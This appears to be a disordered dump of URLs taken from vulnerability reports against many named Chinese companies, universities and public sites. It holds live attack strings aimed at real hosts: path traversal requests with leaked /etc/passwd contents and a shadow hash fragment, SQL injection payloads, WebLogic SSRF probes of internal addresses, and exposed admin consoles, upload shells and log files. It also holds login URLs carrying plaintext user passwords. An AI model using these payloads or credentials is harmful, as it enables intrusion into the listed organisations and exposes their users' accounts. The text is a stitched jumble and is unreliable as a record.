http://www.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.16.0.1:22&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://dmoa.cofco.com/seeyon/index.jsp http://dmoa.cofco.com/seeyon/management/index.jsp www.kuaidi100.com http://www.kuaidi100.com http://**.**.**.** http://jonline.nwu.edu.cn/Admin/index.php/Public/announce_content/id/15* http://**.**.**.**/login/Default.aspx http://**.**.**.**/atd/main.asp?LOGON_USER=liuqiang http://it.nwpu.edu.cn/Web_Index http://**.**.**.**/index.action http://**.**.**.**/liucheng.asp http://**.**.**.**/ http://**.**.**.** http://photos.xywy.com http://hr.chinagasholdings.com/ http://scm.chinagasholdings.com http://oa.baiyyy.com/login.jsp http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883 http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883 http://afis.hit.edu.cn http://**.**.**.**/khoa/index.jsp http://**.**.**.** http://**.**.**.**/admin/database_menager.asp http://**.**.**.**/aviso/list/available_book.php?class=LA http://**.**.**.**/aviso/list/available_book.php?class=LA http://**.**.**.**:1080/device/downExcelexample.action?fileName=../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin web:x:501:501::/usr/local/apache/htdocs/web:/bin/bash joe:x:502:502::/home/joe:/bin/bash zhang:x:503:503::/home/zhang:/bin/bash he:x:504:504::/home/he:/bin/bash ftpuser:x:505:50::/home/ftpuser:/sbin/nologin http://**.**.**.**:1080/device/downExcelexample.action?fileName=../../../../../../../../../../etc/shadow pTEnctVvZlXBQ24BWI3Ay1:16548:0:99999:7 http://**.**.**.**:1080/device/downExcelexample.action?fileName=../../../../../../../../../../etc/hosts http://ggpt.ecnu.edu.cn/ http://ggpt.ecnu.edu.cn/ http://ggpt.ecnu.edu.cn/news1.asp?id=1726&typetitle=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81 http://my.9ku.com/love/ifr_login.asp http://202.205.91.108/syzhaopin/showPolicyBulletinDetail.php?type=3&id=45 http://public.qiushibaike.com/login http://**.**.**.**/service_info.php?item=aegogo http://**.**.**.**/service_info.php?item=aegogo http://**.**.**.**:8888/cy/login!login.do http://fax.cofcotunhe.com/ http://**.**.**.**/main.aspx http://**.**.**.**/home.action https://58.56.128.8/tcs/ http://**.**.**.**:99/mail/liming.nsf http://**.**.**.**:9088/csm/csm/CSMFlex.html# http://**.**.**.**:9088/csmst/home.jsp http://218.200.8.66:8080/seeyon//logs/ctp.log http://218.200.8.66:8080/seeyon/ http://denglish.e21.cn/diag/user_myclazz.do;jsessionid=D34619F852B1EF15E0EB4890AA68A335?pageNum=1&pageRows=5&grade=0&bjtype=common http://**.**.**.**/defaultroot/login.jsp http://**.**.**.**/ http://211.150.65.155:7001/ http://223.252.223.246:8080/manager/html encap:Ethernet fa:16:3e:a7:36:bd addr:10.166.224.82 Bcast:10.166.227.255 Mask:255.255.252.0 f816:3eff:fea7:36bd/64 Scope:Link MTU:1400 packets:114430840 packets:101789664 txqueuelen:1000 http://licai.iqianjin.com/ http://licai.iqianjin.com/dede http://**.**.**.**/Page/Login/UserLogin.aspx http://pg.yadea.com.cn/Member/index.php/ http://123.58.179.79/ http://123.58.179.79/ftp encap:Ethernet addr:123.58.179.79 Bcast:123.58.179.255 Mask:255.255.255.0 fe1f:499e/64 Scope:Link MTU:1500 packets:43826199 packets:12728656 txqueuelen:1000 http://**.**.**.**/main/News/NewsInfo.asp?id=306&ModID=018001 http://**.**.**.**/main/News/NewsInfo.asp?id=306&ModID=018001 http://noa.minxinjituan.com/seeyon/main.do?method=main http://**.**.**.**/seach.php?seach_city=0&search_word=H& http://**.**.**.**/seach.php?seach_city=0&search_word=H& http://**.**.**.**/cn/open.php?aid=506 http://218.58.70.201/haier/ http://**.**.**.**/getpass.jsp?account=user%27&memtype=person http://211.162.119.97:8080/seeyon//logs/ctp.log http://211.162.119.97:8080/seeyon/ http://**.**.**.**/jsp/fgsjj/detail_4_dd.jsp?id=914 http://**.**.**.**/ http://180.169.84.48:7001/travelpre/ https://github.com/frankneu/Perf4jAnalysis/blob/8c5178d23beab37020195dcfbd923864fb63c346/src/com/baidu/perf/main/SendEmail.java http://**.**.**.**/reg.php?F_lang= http://shop.k3cloud.kingdee.com/ http://shop.k3cloud.kingdee.com/show.aspx?type=1&action=GetImg&pids=1 http://218.80.224.36:8080/mics/ http://alarm.fspaej.com http://alarm.fspaej.com/Customer/Check_Detail.aspx?id=1190028 http://boss.ks.91.com/ http://boss.ks.91.com http://218.80.224.42:8080/settlementsys/settlement_flex-debug/settlement_flex.html http://**.**.**.**/ http://**.**.**.** http://www.vrhr.com/ http://easyscholar.ruc.edu.cn http://www.oppo.com/my/r7-plus-preorder/findLocation.php?state=Perak http://**.**.**.**/FileUpload/FCKFile/file/ http://events.oppo.com/2015/neo7-isyana-sarasvati/campaign7/ http://events.oppo.com/2015/neo7-isyana-sarasvati/campaign7/ http://www.chinaums.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://13.0.0.17:8004&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://183.232.32.182/弱口令admin http://app.cmiea.org http://220.231.228.33:6003/axis2/axis2-admin http://202.104.130.162:6003/axis2/axis2-admin http://mail.faw.com.cn/ http://www.cc.ecnu.edu.cn/ http://www.cc.ecnu.edu.cn/news_content.asp?id=77 http://lbs.bjtelecom.net/ http://**.**.**.**/.svn/entries www.nsfocus.com http://mail.tv189.com/ http://www.lifetm.com/www.rar http://www.tcldisplay.com/wap/products/search.php?q=1 http://xianchang03.danmu.tudou.com/login.do http://180.169.84.49/ http://**.**.**.**:1046/ http://login.tudou.com/passport/ytLogin.do?loginname=telisabao%40163.com&remember=1&passwd=715917 http://login.tudou.com/passport/ytLogin.do?loginname=1312367040%40qq.com&remember=1&passwd=1233211 http://**.**.**.**/ http://omega.xiaojukeji.com/crash/list?app_id=10000 http://ad.xiaojukeji.com/page/index https://mail.midea.com http://218.244.145.157:81/ http://**.**.**.**/ http://**.**.**.**/cache.php http://**.**.**.**/ http://**.**.**.**/ygr/servlet/MainServer http://passport.18touch.com/4056754 http://www.scude.cc/webpage/news.jsp?na=%D1%A7%D4%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&type=1 http://www.scude.cc/student_s2008/activity/activityView.jsp?id=19673 http://www.scude.cc/student_s2008/studentInfo/studentinfo_view.jsp?id=318 http://www.scude.cc/student_s2008/faq/FAQList.jsp?type=2 http://www.scude.cc/net_register/register/departmentView.jsp?code=01 http://www.scude.cc/scu/xyyw/xyyw.jsp?id=10629 http://www.scude.cc/wangluo/publicInfo/jiaowuguanli/forms.jsp?keyword=&count=50 http://www.scude.cc/wangluo/publicInfo/jiaowuguanli/files.jsp?keyword=&count=50 http://www.scude.cc/student_s2008/faq/FAQ_view.jsp?id=50195 http://www.scude.cc/student_s2008/faq/FAQList.jsp?keyword=&count=50&type=2 http://www.scude.cc/student_s2008/play_article/play_article_layout.jsp?subjectid=4 http://www.scude.cc/student_s2008/play_article/comment_on.jsp?layout_id=41 http://www.scude.cc/student_s2008/play_7/photo_layout.jsp?topage=279&subjectid=7&onclick=2362 http://www.scude.cc/student_s2008/play_7/photo_layout.jsp?topage=279&subjectid=7&onclick=2362 http://114.242.219.245/seeyon//logs/ctp.log http://114.242.219.245/seeyon/ http://www.9libank.com/fund/index.html https://www.airkunming.com/payByOrder?orderNo=TK201401112308561 https://www.airkunming.com/payByOrder?orderNo=TK201401112308562 http://**.**.**.**/sub/hotelview.asp?hno=182 http://svip.youku.com/pingan/sec https://www.xinliansh.com/js/GetInfoToYK.php http://180.169.84.53:7007 http://**.**.**.**/cja/newscj/newsview.asp?nsid=1736 http://**.**.**.**/product.php?id=66 http://votegd.gridinn.com/uc_server/ http://wireless.xiaozhu.com/app/xzfk/android/220/global/version?_=1449119094538&sessId=f83651f6f45cb6e94578c69a051f8185&pkeys=homecity%2Ccity_searchfilter_13%2Ccity_searchfilter_132&dispathChannel=xiaozhu&userId=1823761635 http://**.**.**.**/co_content_disp.asp?xid=3676 http://**.**.**.**/News/view.asp?id=18 http://oa.sinopharm.com/seeyon/index.jsp http://**.**.**.**/console/ http://**.**.**.**/C6/Jhsoft.Web.login/newview.aspx?id=1问题页面,可GET注入,过滤了空格要使用脚本。 http://**.**.**.**/C6/Jhsoft.Web.login/newview.aspx?id=1 http://oa.cofco-keystone.com http://**.**.**.**/login.aspx http://**.**.**.** http://e.zznissan.com.cn/vehiclescontrast_4.html,将车辆对比抓包得到 http://e.zznissan.com.cn/ajax_models_price.php?modelsId=304网址,存在注入 http://**.**.**.**/user/register.screen http://www.jsdzjg.com/caselist.php?sort_id=1 http://**.**.**.**/category?cid=1 http://**.**.**.**/products?pid=7798 http://**.**.**.**/category?mid=2 http://**.**.**.**:81/ http://**.**.**.**:81/ClinicRecord/PrintInfusion.aspx?DealSN=296451 http://106.3.36.125/dbws/home/login/login.html http://**.**.**.**:8000/ http://www.coolpad.com/member/memberAddressAction!saveAddreass.do http://**.**.**.**/ http://xiaobeike.creditease.cn/ username:admin http://news.taoming.com/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a http://news.taoming.com/data/mysql_error_trace.inc http://news.taoming.com/myad/ http://**.**.**.**/ http://www.flywayex.com/ch/shangchuanzhengjian/处 http://www.flywayex.com/IDCard_Pic/0_3361451.jpg http://**.**.**.**/index.do http://**.**.**.**/ http://**.**.**.**:8080/elmah.axd http://arc.ecnu.edu.cn/ http://**.**.**.**/default.aspx http://**.**.**.**/emportal/ http://**.**.**.**/emportal/login.jsp http://**.**.**.**/emportal/frame.jsp http://oa.mszq.com.cn/lks/koa/lks_workplace.nsf?open http://sxfw.ecpic.com.cn/lifeebiz/a2/pos/Counseling/reportcaselogin.do http://union.alicall.com/union.rar http://www.alicall.com http://**.**.**.**/step1.action http://s.ziroom.com/crm/contractInfo/getCustomerByContractCode http://**.**.**.**/ http://**.**.**.**/news_info.asp?newsid=1 http://**.**.**.**:81/gsservice/AnswerNotice/more.aspx?keyword=%C8%CB%CE%C4%BF%C6%D1%A7%D1%A7%B2%BF http://**.**.**.**:81/gsservice/AnswerNotice/detail.aspx?title=%C9%FA%BB%EE%D5%FE%D6%CE%B5%C4%CE%C4%D1%A7%B1%ED%D5%F7%D2%D4%D0%C2%CA%C0%BC%CD%D0%A1%CB%B5%CE%AA%D6%D0%D0%C4 http://www.tjjt.tongji.edu.cn:80/jtxxkz/net/foreground/searchList.jsp http://**.**.**.**/jc6/platform/sys/login!intro.action http://ss.pkusz.edu.cn/ http://ss.pkusz.edu.cn http://**.**.**.**/computer/database/ http://**.**.**.**/computer/UpFiles/index1.aspx http://**.**.**.**/allSearch.php http://**.**.**.**/allSearch.php http://**.**.**.**/builder.php?cname=PbQx&assortment_id=1 http://**.**.**.**/builder.php?cname=PbQx&assortment_id=1 http://newoa.glsc.com.cn:8082/glsc/mainpage.nsf?open http://**.**.**.**/gzws/index_65.aspx?lcid=17324 http://**.**.**.**/chuangxian/show.php?id=247&type=15 http://**.**.**.**/chuangxian/show.php?id=247&type=15 http://**.**.**.**/system/default.asp http://**.**.**.**/UploadFiles/201512317955263.cer http://el.tju.edu.cn/portal/xlogin http://**.**.**.**/mailindex.nsf http://**.**.**.**/whoarewe_mapfre.html http://**.**.**.**/ http://user.iiyi.com:80 user.iiyi.com/center/friend/get_relation http://**.**.**.**/w_xwzx/show_news.jsp?noteid=348 http://**.**.**.**/news/NewsDetails.aspx?nid=10000377 http://**.**.**.**/news/NewsDetails.aspx?nid=10000377 http://**.**.**.**/invoker/JMXInvokerServlet http://**.**.**.**/news-x.php?tid=179&id=515 http://61.163.78.6:8080/yyoa/ http://**.**.**.**/shopping/ http://**.**.**.**/shopping/ http://59.151.39.85:7001/console http://www.sinopharmsx.com:8181/server_platform/Order_login.do http://**.**.**.**/bugs/wooyun-2010-0137980 http://m.sto.cn:8080/StoAppPro/RetrievePassword?mobileNo=18888888888&verifyCode=1028&newPassword=426542bc41159426e113fcce74b07d84 http://wooyun.org/bugs/wooyun-2010-0145512 http://wooyun.org/bugs/wooyun-2010-0156362 http://**.**.**.**/tc/news_detail.php?id=28 http://**.**.**.**/isgp/yieldn.asp?lk=007HO07560%27%20and%200%3C%3E%28select%20db_name%28%29%29%20-- http://j2e.koolearn.com/homePL.php?PL=whatIsBackDRAFT&THID=1 http://**.**.**.**:8000/logonAction.do http://**.**.**.**:8000/b2b/web/two/indexinfoAction.do?actionType=showOneProduct&xh=6&dwbm=00100000370&sbwzly=0 http://vip.jiayuan.com/broker/?tag=1 http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:8080 http://q.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://mei.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://tao.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://v.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://weixiu.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://review.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://huishou.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://mei.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://q.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://mei.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.58.22.189:7003&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://q.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.58.50.19:7023&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://shuo.rayli.com.cn http://180.169.84.62:8082 http://180.169.84.62:8082/proposalproxy/index.jsp http://180.169.84.62:8082/cK/foot.jsp http://chick.gongfubb.com/chick3/m/ http://chick.gongfubb.com/chick3/m/?ACT=C2 http://chick.gongfubb.com/chick3/m/?ACT=G0 http://chick.gongfubb.com/chick3/m/?ACT=B0 http://chick.gongfubb.com/chick3/m/x_jump.php?UID=32139503 http://chick.gongfubb.com/chick3/m/history.php?UID=1199840 http://chick.gongfubb.com/chick3/m/?ACT=G1&PAD=0&EID=18 http://e.mosh.cn/user/ajaxcheckusererr http://e.mosh.cn/user/dologin http://e.mosh.cn/user/dofindpwd http://e.mosh.cn/user/resendmsg http://1.85.2.244/ http://1.85.2.244/console http://vod.koolearn.com/ http://**.**.**.**/ http://**.**.**.**/news/downLoad.jsp?filePath=../../../../../../../../../../etc/passwd%00.pdf http://www.newv.com.cn/case_enterprise.html http://www.newv.com.cn/case_college.html http://www.newv.com.cn/case_government.html http://elearning.dahuatech.com:8080/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://live.lifan.net//site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://60.190.166.50:89/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://www.dlzhifeng.com:8080/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://218.61.202.30:8080//site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://60.191.246.18:8888/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://dskc.nenu.edu.cn//site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://exam.ecustmde.com/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://volvo.infolearning.so/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://elearning.900950.com//site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://exam.qdgw.edu.cn/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://exp.chinaopenschool.com/kl/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://rlk.chinaopenschool.com/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://61.186.173.202:8088/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://222.195.242.203/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://wk185.wangkao.sczsxx.org/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://www.chinaopenschool.com/gsedu_admin/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://chrysler.infolearning.so/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://180.166.112.32/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://211.155.225.155/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://211.147.233.3/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://cpe.hongjingedu.com//site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://edu-f.gcl-power.com/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://elearning.dahuatech.com:8080/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://live.lifan.net/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://60.190.166.50:89/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://60.191.246.18:8888/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://www.dlzhifeng.com:8080/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://elearning.900950.com/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://218.61.202.30:8080/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://dskc.nenu.edu.cn/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://219.144.128.183:9999/cloud/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://exam.ecustmde.com/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123 http://**.**.**.**/~twvs/teach/teach_detail.php?teach_no=3 http://**.**.**.**/~twvs/teach/teach_detail.php?teach_no=3 http://**.**.**.**:8098/ http://**.**.**.**:8098/ntbookretrset.aspx?Pin=1 http://bbs.mztgame.com/data http://202.108.103.169/manage/login.action的命令执行是已经修复了,现在厂商直接把这个系统移到了其它服务器,而原本在202.108.103.169此服务器上的华泰微信端确没有人提出命令执行,而且厂商根本没意识到要补这个漏洞,所以我觉得是不算重复的) http://202.108.103.169/htweixin http://202.108.103.169/htweixin/pages/taobao/taobaonumberAction!taobaoordernumber http://202.108.103.169/htweixin/pages/taobao/taobaonumberAction!taobaoordernumber pwd:123456 http://www.cctvfinance.com/hangqing/archives?typeid=25 http://**.**.**.**/slp/v2_act_info_show.php?web_id=74 http://**.**.**.**/article.jsp?op=op_browse&record_id=19379060 http://**.**.**.**/article.jsp?op=op_browse&record_id=19379060 http://store.qbao.com/app/shareEmpty/share?appId=447&shareChannel=qbao&pid=31330779 http://**.**.**.**/ http://60.191.59.19:8080/index122.html http://tdjxxy.tju.edu.cn/staff.html?uid=1734 http://**.**.**.**/view/viewdetail.php?docid=154805 http://**.**.**.**/bugs/wooyun-2010-0106385 http://**.**.**.**:8089/ http://**.**.**.**/coremail/index.jsp http://**.**.**.**/vip/login.aspx http://**.**.**.**/Admin/Login.aspx https://mail.xdf.cn http://**.**.**.**/email_detail.jsp?id=bcf53d59e012406cbb3b0642d2b7cf6f https://**.**.**.**/hwf452/efb/blob/ab34ce57c1c94d32f4c40ac64a49a0851e1ea7ae/efb/build/classes/jdbc.properties http://**.**.**.**/slmwebapp/UserManagerAction_checkUser.do http://**.**.**.**/slmwebapp/UserManagerAction_checkUser.do http://**.**.**.**/manager/ http://**.**.**.**/hotlink/hotlinks.aspx?kid=&cols=5 http://sjds.cctvcjw.com/CCTVinfo/Details.aspx?id=140023&news_type_id=0104 http://59.151.39.90/indexlis.jsp http://59.151.39.90/common/easyQueryVer3/EasyQueryXML.jsp http://59.151.39.90 www.cofco-property.cn/iframe.aspx?id=1* http://wooyun.org/bugs/wooyun-2010-036553 www.cofco-property.cn/iframe.aspx?id=1* http://oa.superjia.com/ http://**.**.**.**/search/login.php http://tuanwei.nwu.edu.cn/tscms/paper.php?id=136&p=2 http://**.**.**.**/ec/oldpolicy/oldpolicy_into.action http://kusgm.kongzhong.com/count.php?pageurl=http%3A//kf.kongzhong.com/&referer=&website=1 http://60.10.8.227:88/web/careerapply/HrmCareerApplyWorkView.jsp?id=1%20union%20select%201,2,3,4,5,@@version http://www.wasu.com.cn/admin/ http://m.sfn.cn/admin/ http://oa.gaosiedu.com/tools/SWFUpload/upload.jsp height:20px;BORDER http://www.xxoo.com/null上传的文件名.jsp http://oa.gaosiedu.com/nulljspspy.jsp?o=index http://**.**.**.**/ http://**.**.**.**:80/ http://**.**.**.**/bugs/wooyun-2010-0106778 http://www.kysec.cn/qk/tools/Main.aspx http://www.kysec.cn/qk/tools/main.aspx?path=/../ http://ttf.ecnu.edu.cn/ http://ttf.ecnu.edu.cn http://118.122.88.90:60465/nulljsp1.jsp http://118.122.88.90:60465/tools/SWFUpload/upload.jsp height:20px;BORDER http://www.xxoo.com/null上传的文件名.jsp http://**.**.**.**:80/ http://xml.rayli.com.cn/article/search.php?tag=-1 http://**.**.**.** HTTP://life.ufh.com.cn/list5.php?ch=50&a_id=5 http://**.**.**.**:18080/ssoserver/static/login.html http://**.**.**.**:81 http://tbp.cheyipai.com/Auction/Index/440300 http://**.**.**.**/aboutUsDetail.php?id=1 http://mail.kysec.cn http://www.fjtlzf.com/?phpinfo=1 http://www.fjtlzf.com/tonglianzhifu/ http://www.muzhiwan.com/index.php?action=common&opt=searchHistroy&vid= http://mech.upc.edu.cn/ http://mech.upc.edu.cn http://www.sy.e21.cn:8080/Portal/Login.aspx?r=0.926470052683726 http://e.cheyipai.com/WebController/Order/getBidDetails http://e.cheyipai.com http://sta.upc.edu.cn/ http://sta.upc.edu.cn http://office.galaxyasset.com/ http://office.galaxyasset.com/web/careerapply/HrmCareerApplyWorkEdit.jsp?id=1%20union%20select%201,2,3,@@version,5,6 http://office.mingyi.com.cn/txl/manage/Manage_list.aspx http://office.mingyi.com.cn/txl/manage/Manage_add.aspx http://hq.fruitday.com:88/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://96371.wasu.com/index.do http://www.sky-dome.com.cn/dede/index.php http://jspx.sicnu.edu.cn/msggl.do?currentpage=1&method=getMsgPages&pagesize=10&type=-1 http://www.hehuoren.com/sk15.php http://**.**.**.**/bugs/wooyun-2015-0156617 http://tb.koolearn.com/ http://tb.koolearn.com/index/lsub?username=a&password=s&checkbox=0 http://jpkc.e21.cn/ http://**.**.**.**/news/news1.php?id=2 http://**.**.**.**/news/news1.php?id=2%20and%201=2%20UNION%20SELECT%201,2,user%28%29,4,5,6,7,8,9,10 http://**.**.**.**/downproject.php?u=../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin www:x:80:80::/home/www:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin vizz:x:507:509::/home/vizz:/bin/bash oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin myiconlight:x:103:80:**.**.**.**:/export/web/myiconlight:/sbin/nologin mysql:x:508:508::/usr/local/mysql:/sbin/nologin gino:x:502:500::/export/web/gino:/bin/bash swsd2010:x:2653:80::/export/web/swsd2010:/bin/sh alias:x:2654:510::/var/qmail/alias:/sbin/nologin qmaild:x:2655:510::/var/qmail:/sbin/nologin qmaill:x:2656:510::/var/qmail:/sbin/nologin qmailp:x:2657:510::/var/qmail:/sbin/nologin qmailq:x:2658:511::/var/qmail:/sbin/nologin qmailr:x:2659:511::/var/qmail:/sbin/nologin qmails:x:2660:511::/var/qmail:/sbin/nologin aster:x:2534:80:**.**.**.**:/export/web/aster:/bin/sh wincalpharm:x:2860:80:**.**.**.**:/export/web/wincalpharm:/sbin/nologin dejohk:x:2862:80:**.**.**.**:/export/web/dejohk:/sbin/nologin worldlinkhk:x:2864:80:**.**.**.**:/export/web/worldlinkhk:/sbin/nologin outdoorproducts:x:2867:80:**.**.**.**:/export/web/outdoorproducts:/sbin/nologin joannshe:x:2869:80:**.**.**.**:/export/web/joannshe:/bin/sh synergytechhk:x:2872:80:**.**.**.**:/export/web/synergytechhk:/sbin/nologin keibert:x:2873:80:**.**.**.**:/export/web/keibert:/sbin/nologin healthguardcn:x:2875:80:**.**.**.**:/export/web/healthguardcn:/sbin/nologin colroot:x:2876:80:**.**.**.**:/export/web/colroot:/sbin/nologin cm2square:x:2878:80:**.**.**.**:/export/web/cm2square:/sbin/nologin damoorghk:x:2882:80:**.**.**.**:/export/web/damoorghk:/sbin/nologin taicohk:x:2884:80:**.**.**.**:/export/web/taicohk:/sbin/nologin sideways:x:2888:80:**.**.**.**:/export/web/sideways:/sbin/nologin timwaytest:x:2889:80:**.**.**.**:/export/web/timwaytest:/sbin/nologin freeformoptical:x:2893:80:**.**.**.**:/export/web/freeformoptical:/sbin/nologin jollykingdom:x:2894:80:**.**.**.**:/export/web/jollykingdom:/sbin/nologin angelgrace:x:2902:80:**.**.**.**:/export/web/angelgrace:/sbin/nologin searcheasy:x:2903:80:**.**.**.**:/export/web/searcheasy:/sbin/nologin heijkoopinvest:x:2906:80:**.**.**.**:/export/web/heijkoopinvest:/sbin/nologin 